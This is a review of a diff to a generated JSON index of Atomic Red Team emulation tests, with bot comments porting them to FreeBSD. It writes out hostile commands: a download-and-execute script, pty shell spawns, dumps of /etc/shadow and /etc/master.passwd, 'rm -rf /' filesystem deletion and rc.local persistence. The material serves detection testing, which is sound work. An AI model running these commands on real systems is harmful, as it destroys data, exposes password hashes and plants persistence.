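Review bot: The rewritten `prereq_command` still ends in `; echo $?`, so its exit status is echo's (always 0) and a missing `requests` module never triggers `get_prereq_command`; drop the trailing `; echo $?` so `$which_python -c 'import requests' 2>/dev/null` decides the outcome. `get_prereq_command` then installs with a bare `pip`, which may belong to a different interpreter than the one `which` selected (the reason `python3.9` was added is hosts without an unversioned `python3`); use `$which_python -m pip install requests` after recomputing `which_python` in that command. The test object this executor belongs to starts above the hunk. Because the file is generated, the change belongs in the T1059.006 source YAML.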
@@ -590887,18 +592603,18 @@ "dependencies": [ { "description": "Requires Python\n", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", "get_prereq_command": "pip install requests \n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python #{python_script_name}\n", "name": "sh", 
"cleanup_command": "rm #{python_script_name} #{payload_file_name} \n" } }, { - "name": "Execute Python via Python executables (Linux)", + "name": "Execute Python via Python executables", "auto_generated_guid": "0b44d79b-570a-4b27-a31f-3bf2156e5eaa", "description": "Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments\n", "supported_platforms": [ 
@@ -590940,12 +592656,12 @@ "dependencies": [ { "description": "Requires Python\n", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $?\n", "get_prereq_command": "pip install requests \n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\necho 'import requests' > #{python_script_name}\necho 'import os' >> #{python_script_name}\necho 'url = \"#{script_url}\"' >> #{python_script_name}\necho 'malicious_command = \"#{executor} #{payload_file_name} #{script_args}\"' >> #{python_script_name}\necho 'session = requests.session()' >> #{python_script_name}\necho 'source = session.get(url).content' >> #{python_script_name}\necho 'fd = open(\"#{payload_file_name}\", \"wb+\")' >> #{python_script_name}\necho 'fd.write(source)' >> #{python_script_name}\necho 'fd.close()' >> #{python_script_name}\necho 
'os.system(malicious_command)' >> #{python_script_name}\n$which_python -c 'import py_compile; py_compile.compile(\"#{python_script_name}\", \"#{python_binary_name}\")'\n$which_python #{python_binary_name}\n", "name": "sh", "cleanup_command": "rm #{python_binary_name} #{python_script_name} #{payload_file_name}\n" } @@ -590960,13 +592676,13 @@ "dependencies": [ { "description": "Verify if python is in the environment variable path and attempt to import requests library.\n", - "prereq_command": "which_python=$(which python || which python3 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $? \n", + "prereq_command": "which_python=$(which python || which python3 || which python3.9 || which python2); $which_python -V\n$which_python -c 'import requests' 2>/dev/null; echo $? \n", "get_prereq_command": "pip install requests\n" } ], "executor": { - "command": "which_python=$(which python || which python3 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit", - "name": "bash" + "command": "which_python=$(which python || which python3 || which python3.9 || which python2)\n$which_python -c \"import pty;pty.spawn('/bin/sh')\"\nexit\n$which_python -c \"import pty;pty.spawn('/bin/bash')\"\nexit", + "name": "sh" } } ] @@ -592998,16 +594714,16 @@ "display_name": "Resource Hijacking", "atomic_tests": [ { - "name": "macOS/Linux - Simulate CPU Load with Yes", + "name": "FreeBSD/macOS/Linux - Simulate CPU Load with Yes", "auto_generated_guid": "904a5a0e-fb02-490d-9f8d-0e256eb37549", "description": "This test simulates a high CPU load as you might observe during cryptojacking attacks.\nEnd the test by using CTRL/CMD+C to break.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "executor": { "command": "yes > /dev/null\n", - "name": "bash" + "name": "sh" } } ] 
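Review bot: The second `pty.spawn('/bin/bash')` in the rewritten executor hardcodes a path that does not exist on FreeBSD, where bash is a port installed under `/usr/local/bin`, so the test that was just moved from `bash` to `sh` for FreeBSD support fails at its last step with FileNotFoundError after the `/bin/sh` spawn succeeded. Resolve it at run time, `$which_python -c "import pty,shutil;pty.spawn(shutil.which('bash') or '/bin/sh')"`, or drop the bash spawn and state in the description that only `/bin/sh` is exercised. The enclosing test object starts above the hunk. Generated file; fix the source YAML.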
@@ -597241,19 +598957,20 @@ ], "command_list": [ "sudo cat /etc/shadow > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", + "sudo cat /etc/master.passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", "cat /etc/passwd > /tmp/T1003.008.txt\ncat /tmp/T1003.008.txt\n", - "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt\n", - "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > /tmp/T1003.008.txt\ntestcat /etc/shadow > /tmp/T1003.008.txt\n" + "unamestr=$(uname)\nif [ \"$unamestr\" = 'Linux' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt; elif [ \"$unamestr\" = 'FreeBSD' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/master.passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > /tmp/T1003.008.txt; fi\n", + "testcat(){ (while read line; do echo $line >> /tmp/T1003.008.txt; done < $1) }\n[ \"$(uname)\" = 'FreeBSD' ] && testcat /etc/master.passwd\ntestcat /etc/passwd\ntestcat /etc/shadow\n" ], "commands": [], "queries": [], "parsed_datasets": [ { "source": "atomics/T1003.008/T1003.008.yaml", - "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd and /etc/shadow", + "name": "Atomic Red Team Test - OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow", "content": { "attack_technique": "T1003.008", - "display_name": "OS Credential Dumping: /etc/passwd and /etc/shadow", + "display_name": "OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow", "atomic_tests": [ { "name": "Access /etc/shadow (Local)", 
@@ -597276,10 +598993,31 @@ "elevation_required": true } }, + { + "name": "Access /etc/master.passwd (Local)", + "auto_generated_guid": "5076874f-a8e6-4077-8ace-9e5ab54114a5", + "description": "/etc/master.passwd file is accessed in FreeBSD environments\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Path where captured results will be placed", + "type": "path", + "default": "/tmp/T1003.008.txt" + } + }, + "executor": { + "command": "sudo cat /etc/master.passwd > #{output_file}\ncat #{output_file}\n", + "cleanup_command": "rm -f #{output_file}\n", + "name": "sh", + "elevation_required": true + } + }, { "name": "Access /etc/passwd (Local)", "auto_generated_guid": "60e860b6-8ae6-49db-ad07-5e73edd88f5d", - "description": "/etc/passwd file is accessed in Linux environments\n", + "description": "/etc/passwd file is accessed in FreeBSD and Linux environments\n", "supported_platforms": [ "linux" ], @@ -597297,9 +599035,9 @@ } }, { - "name": "Access /etc/{shadow,passwd} with a standard bin that's not cat", + "name": "Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat", "auto_generated_guid": "df1a55ae-019d-4120-bc35-94f4bc5c4b0a", - "description": "Dump /etc/passwd and /etc/shadow using ed\n", + "description": "Dump /etc/passwd, /etc/master.passwd and /etc/shadow using ed\n", "supported_platforms": [ "linux" ], 
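Review bot: `sudo cat /etc/master.passwd > #{output_file}` writes every password hash on the host into `/tmp/T1003.008.txt` under the invoking user's umask, so until `cleanup_command` runs the dump is typically world-readable; prefix the command with `umask 077; ` (or add `chmod 600 #{output_file}` before the final `cat`) so the atomic does not itself hand the hashes to every local user. The description targets FreeBSD, yet the test is tagged `linux` and relies on `sudo`, which is not part of the FreeBSD base system; with `elevation_required: true` already set, a plain `cat` plus a leading `[ "$(uname)" = 'FreeBSD' ] || exit 1` is more reliable. The same world-readable output exists in the neighbouring shadow tests, but this is the line being added. As this JSON is generated, patch the source atomic YAML.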
@@ -597311,16 +599049,16 @@ } }, "executor": { - "command": "echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > #{output_file}\n", + "command": "unamestr=$(uname)\nif [ \"$unamestr\" = 'Linux' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > ${output_file}; elif [ \"$unamestr\" = 'FreeBSD' ]; then echo -e \"e /etc/passwd\\n,p\\ne /etc/master.passwd\\n,p\\ne /etc/shadow\\n,p\\n\" | ed > ${output_file}; fi\n", "cleanup_command": "rm -f #{output_file}\n", - "name": "bash", + "name": "sh", "elevation_required": true } }, { - "name": "Access /etc/{shadow,passwd} with shell builtins", + "name": "Access /etc/{shadow,passwd,master.passwd} with shell builtins", "auto_generated_guid": "f5aa6543-6cb2-4fae-b9c2-b96e14721713", - "description": "Dump /etc/passwd and /etc/shadow using bash builtins\n", + "description": "Dump /etc/passwd, /etc/master.passwd and /etc/shadow using sh builtins\n", "supported_platforms": [ "linux" ], @@ -597332,9 +599070,9 @@ } }, "executor": { - "command": "function testcat(){ echo \"$(< $1)\"; }\ntestcat /etc/passwd > #{output_file}\ntestcat /etc/shadow > #{output_file}\n", + "command": "testcat(){ (while read line; do echo $line >> #{output_file}; done < $1) }\n[ \"$(uname)\" = 'FreeBSD' ] && testcat /etc/master.passwd\ntestcat /etc/passwd\ntestcat /etc/shadow\n", "cleanup_command": "rm -f #{output_file}\n", - "name": "bash", + "name": "sh", "elevation_required": true } } @@ -606740,7 +608478,7 @@ } }, { - "name": "macOS/Linux - Overwrite file with DD", + "name": "FreeBSD/macOS/Linux - Overwrite file with DD", "auto_generated_guid": "38deee99-fd65-4031-bec8-bfa4f9f26146", "description": "Overwrites and deletes a file using DD.\nTo stop the test, break the command with CTRL/CMD+C.\n", "supported_platforms": [ 
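Review bot: The rewritten `ed` executor redirects to `${output_file}` instead of the `#{output_file}` template used by every sibling test and by its own `cleanup_command`; if the runner only substitutes `#{...}`, the redirection target expands to nothing and the whole `if ... elif` fails to parse, and if it does tolerate `${}` the output lands where cleanup never deletes it. The switch from `bash` to `sh` also makes `echo -e` unportable: dash (the `sh` on Debian/Ubuntu) prints `-e` literally as the first ed command, so use `printf 'e /etc/passwd\n,p\ne /etc/shadow\n,p\n' | ed > #{output_file}` in the Linux branch and the analogous printf in the FreeBSD branch. The FreeBSD branch additionally asks ed for `/etc/shadow`, which does not exist there and only adds a `?` to the output. The test object starts above the hunk; since this JSON is generated, fix the source YAML.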
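Review bot: `testcat` reads with a bare `read line` and echoes `$line` unquoted, so backslashes are consumed and every line is re-split and subjected to pathname expansion before being written (hash fields containing `*` or `?` are glob patterns at that point); use `while IFS= read -r line; do printf '%s\n' "$line" >> #{output_file}; done < $1` for a faithful copy. `read` also drops a final line without a trailing newline, and the loop appends with `>>` where the removed bash version overwrote, so repeated runs without cleanup accumulate output. The description now says "sh builtins" although `echo` and `read` are builtins in both shells; the real change is portability, which is worth saying. Generated file; change the source YAML.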
@@ -606761,7 +608499,7 @@ }, "executor": { "command": "dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes\n", - "name": "bash" + "name": "sh" } }, { @@ -611478,6 +613216,7 @@ "Remove-Item -path $env:TEMP\\deleteme_T1551.004\n", "Remove-Item -Path $env:TEMP\\deleteme_folder_T1551.004 -Recurse\n", "rm -rf / --no-preserve-root > /dev/null 2> /dev/null\n", + "chflags -R 0 /\nrm -rf / > /dev/null 2> /dev/null\n", "Remove-Item -Path (Join-Path \"$Env:SystemRoot\\prefetch\\\" (Get-ChildItem -Path \"$Env:SystemRoot\\prefetch\\*.pf\" -Name)[0])\n", "New-Item -Path $env:TEMP\\TeamViewer_54.log -Force | Out-Null\nRemove-Item $env:TEMP\\TeamViewer_54.log -Force -ErrorAction Ignore\n", "$startupClass = Get-CimClass -ClassName Win32_ProcessStartup;\n$startupInfo = New-CimInstance -CimClass $startupClass -Property @{ShowWindow = 0} -ClientOnly;\n$processClass = Get-CimClass -ClassName Win32_Process;\nInvoke-CimMethod -CimClass $processClass -MethodName Create -Arguments @{\n Commandline = 'cmd.exe /c \"timeout /nobreak /t 10 >nul 2>nul & del /f #{location}\"';\n ProcessStartupInformation = [CimInstance]$startupInfo\n};\n", @@ -611495,7 +613234,7 @@ "display_name": "Indicator Removal on Host: File Deletion", "atomic_tests": [ { - "name": "Delete a single file - Linux/macOS", + "name": "Delete a single file - FreeBSD/Linux/macOS", "auto_generated_guid": "562d737f-2fc6-4b09-8c2a-7f8ff0828480", "description": "Delete a single file from the temporary directory\n", "supported_platforms": [ @@ -611529,7 +613268,7 @@ } }, { - "name": "Delete an entire folder - Linux/macOS", + "name": "Delete an entire folder - FreeBSD/Linux/macOS", "auto_generated_guid": "a415f17e-ce8d-4ce2-a8b4-83b674e7017e", "description": "Recursively delete the temporary directory and all files contained within it\n", "supported_platforms": [ 
@@ -611695,6 +613434,18 @@ "name": "bash" } }, + { + "name": "Delete Filesystem - FreeBSD", + "auto_generated_guid": "b5aaca7e-a48f-4f1b-8f0f-a27b8f516608", + "description": "This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.\n", + "supported_platforms": [ + "linux" + ], + "executor": { + "command": "chflags -R 0 /\nrm -rf / > /dev/null 2> /dev/null\n", + "name": "sh" + } + }, { "name": "Delete Prefetch File", "auto_generated_guid": "36f96049-0ad7-4a5f-8418-460acaeb92fb", 
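Review bot: The new "Delete Filesystem - FreeBSD" test has no OS guard and no `elevation_required` flag even though it is tagged `linux`, so a "run every T1070.004 test on Linux" invocation reaches `rm -rf /` on a Linux host; GNU coreutils refuses `/` without `--no-preserve-root`, but other rm implementations may not, and on FreeBSD `chflags -R 0 /` clears the immutable flags (subject to securelevel) so nothing else stands in the way. Add `[ "$(uname)" = 'FreeBSD' ] || { echo 'FreeBSD only'; exit 1; }` as the first command line and set `"elevation_required": true` so the runner at least prompts before executing it. The destructive warning in the description is good and should stay. Generated file; patch the source YAML.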
@@ -619930,7 +621681,7 @@ "command_list": [ "sudo echo osascript -e 'tell app \"Finder\" to display dialog \"Hello World\"' >> /etc/rc.common\n", "filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.common\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\\\"\" | sudo tee -a /etc/rc.common\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.common\nsudo chmod +x /etc/rc.common\n", - "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n" + "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\n[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local\necho \"\\npython3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n" ], "commands": [], "queries": [], 
@@ -619977,9 +621728,9 @@ "linux" ], "executor": { - "name": "bash", + "name": "sh", "elevation_required": true, - "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\nprintf '%s\\n' '#!/bin/bash' | sudo tee /etc/rc.local\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf '%s\\n' 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", + "command": "filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi\n[ \"$(uname)\" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local\necho \"\\npython3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\\\"\" | sudo tee -a /etc/rc.local\nprintf 'exit 0' | sudo tee -a /etc/rc.local\nsudo chmod +x /etc/rc.local\n", "cleanup_command": "origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi\n" } } 
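Review bot: The FreeBSD branch `[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9 && printf '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local || printf '#!/bin/bash' | sudo tee /etc/rc.local` has three defects: `alias` affects only the current shell, not the literal `python3` written into `/etc/rc.local`, so on a FreeBSD host that only has `python3.9` the persisted line never executes; inside single quotes the backslash before `!` is literal and printf passes it through, so the shebang written is `#\!/usr/local/bin/bash`; and the `a && b || c` chain runs the Linux branch as well whenever any FreeBSD step fails. The following `echo "\npython3 -c …"` relies on `echo` interpreting `\n`, which bash's builtin does not, so on a Linux host whose `sh` is bash the shebang and payload land on one line, which is exactly why the removed version used `printf '%s\n'`. I would pick the paths once, `py=python3; bash_path=/bin/bash; [ "$(uname)" = 'FreeBSD' ] && { py=python3.9; bash_path=/usr/local/bin/bash; }`, then write `printf '#!%s\n' "$bash_path" | sudo tee /etc/rc.local` and `echo "$py -c \"…\"" | sudo tee -a /etc/rc.local`, restoring `printf '%s\n' 'exit 0'`. The test object starts above the hunk; since this JSON is generated, fix the source YAML.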
@@ -625326,6 +627077,7 @@ ], "command_list": [ "echo \"[Unit]\" > /etc/systemd/system/art-systemd-service.service\necho \"Description=Atomic Red Team Systemd Service\" >> /etc/systemd/system/art-systemd-service.service\necho \"\" >> /etc/systemd/system/art-systemd-service.service\necho \"[Service]\" >> /etc/systemd/system/art-systemd-service.service\necho \"Type=simple\"\necho \"ExecStart=/bin/touch /tmp/art-systemd-execstart-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStartPre=/bin/touch /tmp/art-systemd-execstartpre-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStartPost=/bin/touch /tmp/art-systemd-execstartpost-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecReload=/bin/touch /tmp/art-systemd-execreload-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStop=/bin/touch /tmp/art-systemd-execstop-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"ExecStopPost=/bin/touch /tmp/art-systemd-execstoppost-marker\" >> /etc/systemd/system/art-systemd-service.service\necho \"\" >> /etc/systemd/system/art-systemd-service.service\necho \"[Install]\" >> /etc/systemd/system/art-systemd-service.service\necho \"WantedBy=default.target\" >> /etc/systemd/system/art-systemd-service.service\nsystemctl daemon-reload\nsystemctl enable art-systemd-service.service\nsystemctl start art-systemd-service.service\n", + "echo '#\\!/bin/sh' > /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test\necho '#' >> /usr/local/etc/rc.d/art-test\necho '# PROVIDE: art-test' >> /usr/local/etc/rc.d/art-test\necho '# REQUIRE: LOGIN' >> /usr/local/etc/rc.d/art-test\necho '# KEYWORD: shutdown' >> /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test\necho '. 
/etc/rc.subr' >> /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test\necho 'name=\"art_test\"' >> /usr/local/etc/rc.d/art-test\necho 'rcvar=art_test_enable' >> /usr/local/etc/rc.d/art-test\necho 'load_rc_config ${name}' >> /usr/local/etc/rc.d/art-test\necho 'command=\"/usr/bin/touch\"' >> /usr/local/etc/rc.d/art-test\necho 'start_cmd=\"art_test_start\"' >> /usr/local/etc/rc.d/art-test\necho '' >> /usr/local/etc/rc.d/art-test\necho 'art_test_start()' >> /usr/local/etc/rc.d/art-test \necho '{' >> /usr/local/etc/rc.d/art-test\necho ' ${command} /tmp/art-test.marker' >> /usr/local/etc/rc.d/art-test\necho '}' >> /usr/local/etc/rc.d/art-test\necho ' ' >> /usr/local/etc/rc.d/art-test \necho 'run_rc_command \"$1\"' >> /usr/local/etc/rc.d/art-test\nchmod +x /usr/local/etc/rc.d/art-test\nservice art-test enable\nservice art-test start\n", "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\" | 
sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl restart T1543.002\n" ], "commands": [], @@ -625333,10 +627085,10 @@ "parsed_datasets": [ { "source": "atomics/T1543.002/T1543.002.yaml", - "name": "Atomic Red Team Test - Create or Modify System Process: Systemd Service", + "name": "Atomic Red Team Test - Create or Modify System Process: SysV/Systemd Service", "content": { "attack_technique": "T1543.002", - "display_name": "Create or Modify System Process: Systemd Service", + "display_name": "Create or Modify System Process: SysV/Systemd Service", "atomic_tests": [ { "name": "Create Systemd Service", 
@@ -625393,6 +627145,31 @@ "name": "bash" } }, + { + "name": "Create SysV Service", + "auto_generated_guid": "760fe8d2-79d9-494f-905e-a239a3df86f6", + "description": "This test creates a SysV service unit file and enables it as a service.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "rc_service_path": { + "description": "Path to rc service file", + "type": "path", + "default": "/usr/local/etc/rc.d" + }, + "rc_service_file": { + "description": "File name of rc service file", + "type": "string", + "default": "art-test" + } + }, + "executor": { + "command": "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '# REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD: shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho '. 
/etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho 'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable' >> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}' >> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"' >> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"' >> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho 'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{' >> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker' >> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command \"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice art-test enable\nservice art-test start\n", + "cleanup_command": "sysrc -x art_test_enable\nrm -f #{rc_service_path}/#{rc_service_file}\n", + "name": "sh" + } + }, { "name": "Create Systemd Service file, Enable the service , Modify and Reload the service.", "auto_generated_guid": "c35ac4a8-19de-43af-b9f8-755da7e89c89", @@ -629902,6 +631679,7 @@ "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -sc dclist\n", "ip neighbour show\n", "ip route show\n", + "netstat -r | grep default\n", "ip tcp_metrics show |grep --invert-match \"^127\\.\"\n", "$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher(\"(ObjectCategory=Computer)\")\n$DirectorySearcher.PropertiesToLoad.Add(\"Name\")\n$Computers = $DirectorySearcher.findall()\nforeach ($Computer in $Computers) {\n $Computer = $Computer.Properties.name\n if (!$Computer) { Continue }\n Write-Host $Computer}\n", "Get-AdComputer -Filter *\n", 
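Review bot: The new rc.d test writes `#\!/bin/sh` as its first line — in single quotes the backslash is literal and `echo` keeps it — so the script has no valid shebang and appears to run only because `service` falls back to interpreting an ENOEXEC file as a shell script; `echo '#!/bin/sh'` is what was meant (the `\!` is an interactive history-escape habit that has no place in a script). `rc_service_file` is an input argument, but `PROVIDE: art-test`, `name="art_test"`, `rcvar=art_test_enable`, `service art-test enable`/`start` and the cleanup's `sysrc -x art_test_enable` are all hardcoded, so any non-default value yields a script `service` cannot find while cleanup still deletes the file. Writing to `/usr/local/etc/rc.d` and running `service` require root, yet there is no `elevation_required: true`, and cleanup leaves `/tmp/art-test.marker` behind. The title "Create SysV Service" and the new "SysV/Systemd" display name are also misleading: FreeBSD rc.d is BSD-style init, and the SysV case in this technique is the `/etc/init.d` + `update-rc.d`/`chkconfig` test. Generated file; fix in the source YAML.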
@@ -630298,6 +632076,18 @@
 "name": "sh"
 }
 },
+ {
+ "name": "Remote System Discovery - netstat",
